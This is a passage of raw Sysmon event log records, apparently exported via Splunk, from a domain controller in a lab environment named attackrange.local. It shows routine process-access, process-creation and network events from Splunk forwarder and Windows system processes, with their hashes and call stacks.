vc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000021726Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:53.846{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=754A1F4E66E230EEE470E072C4B14D02,SHA256=A5255FA24D0A4B9CDEE6498A6772212AB53CF1EA8459D97690179D7517FA65ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021725Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:53.315{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95C3A167E690549D55BD8B4D6C54DABD,SHA256=7A3AFB7237BC84781919EB4E66AA087671DC0938C2579AD112A42150E87EBE55,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021724Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:53.096{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A230-60D3-9904-00000000CF01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021723Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:53.096{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021722Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:53.096{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021721Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:53.096{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021720Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:53.096{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021719Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:53.096{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A230-60D3-9904-00000000CF01}2460C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021718Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:53.096{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A230-60D3-9904-00000000CF01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021717Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:52.973{4DB9351A-A230-60D3-9904-00000000CF01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021748Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.846{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCE596F9695A384CE3A0B48026C4CBF1,SHA256=0842DB3BF6A3169B60FC85D571DA195B3EA4B49118798D24D13401AAF7C7DA71,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021747Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.784{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A232-60D3-9B04-00000000CF01}5972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021746Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:54.784{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021745Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.784{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021744Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:54.784{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021743Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.784{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021742Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.784{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A232-60D3-9B04-00000000CF01}5972C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021741Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.784{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A232-60D3-9B04-00000000CF01}5972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021740Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.660{4DB9351A-A232-60D3-9B04-00000000CF01}5972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021739Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.784{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=03EDCFEB283E0838A2FFCB6B86177C63,SHA256=E4A750968AEBB5C74C347F11BE1C7FD75CB5E93AEAA31E6BBB4A96CA02E1AF7C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000021738Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:53.247{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61445-false10.0.1.12-8000- 354300x800000000000000021737Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:52.589{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61444-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 354300x800000000000000021736Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:52.589{4DB9351A-9DEA-60D3-2B00-00000000CF01}3024C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61444-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 
10341000x800000000000000021735Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.331{4DB9351A-A231-60D3-9A04-00000000CF01}51443780C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021734Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.049{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A231-60D3-9A04-00000000CF01}5144C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021733Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:54.018{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021732Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.018{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021731Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:54.018{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021730Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.018{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021729Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.018{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A231-60D3-9A04-00000000CF01}5144C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021728Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:54.018{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A231-60D3-9A04-00000000CF01}5144C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program 